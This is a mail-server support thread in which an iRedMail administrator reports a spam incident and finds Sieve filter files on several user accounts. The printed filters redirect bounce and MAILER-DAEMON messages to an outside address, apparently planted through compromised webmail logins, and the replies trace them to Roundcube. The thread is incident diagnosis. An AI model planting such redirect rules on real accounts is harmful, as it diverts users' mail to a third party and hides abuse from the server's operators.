1

Topic: spamming issue

==== REQUIRED BASIC INFO OF YOUR IREDMAIL SERVER ====
- iRedMail version (check /etc/iredmail-release): pro latest
- Deployed with iRedMail Easy or the downloadable installer?
- Linux/BSD distribution name and version: debian 9
- Store mail accounts in which backend (LDAP/MySQL/PGSQL): mysql
- Web server (Apache or Nginx):nginx
- Manage mail accounts with iRedAdmin-Pro? yes
- [IMPORTANT] Related original log or error message is required if you're experiencing an issue.
====

hi

we had recent incident of spamming

on a search we found the following files under

/var/vmail/vmail1/customerdomain.com/user

# ls -la
total 4
drwx------ 3 vmail vmail  75 Jan 31 16:06 .
drwx------ 4 vmail vmail  46 Jan  7 22:11 ..
lrwxrwxrwx 1 vmail vmail  66 Jan  7 22:11 dovecot.sieve -> /var/vmail/vmail1/customerdomain.com/user/sieve/managesieve.sieve
-rw------- 1 vmail vmail 188 Jan  7 23:35 dovecot.svbin
drwx------ 2 vmail vmail  10 Jan  7 22:11 tmp
###############

and in the file managesieve.sieve created above we found the following content

##################
# rule:[<MAILER-DAEMON>]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[Undeliverable:]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[Undelivered Mail Returned to Sender]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[MAILER-DAEMON@ns1.MailserServerHostname.net]
if true
{
        redirect "bharath@ecotechlabs.in";
}
###################

After some more search we found that around 6 other users of different domains had the similar manage.sieve created

When tried to access the sogo url for a specific user it gave us the following message

"An external sieve script is active "
and a button let sogo handle everything

Please see attached image when we tried to access sogo of a specific user.

Myq questions please

1) Normally when forwarding or vacation message is set via sogo the file that gets created is sogo.sieve.
How did the managesieve.sieve file get created since this not present under any of the other users ?
Is it some kind of a hacking incident ?

2) How can we prevent managesieve access to users ?

3) Can roundcube or sogo be misused to cause this ?

thanks
rajesh

----

Spider Email Archiver: On-Premises, lightweight email archiving software developed by iRedMail team. Supports Amazon S3 compatible storage and custom branding.

2

Re: spamming issue

- If you don't open managesieve port (4190) to public internet in firewall, then it must be created through Roundcube or SOGo web UI.
- Roundcube creates sieve file with file name "managesieve.sieve". So it's very possible that this file was created with Roundcube.

If user password is weak, it's very possible that the account was hacked and the sieve rules were created by the cracker.

3 (edited by RajeshM 2020-02-03 11:22:52)

Re: spamming issue

Thanks
I have checked out by adding filters using roundcube and it created managesieve.sieve

I have disabled roundcube

Rajesh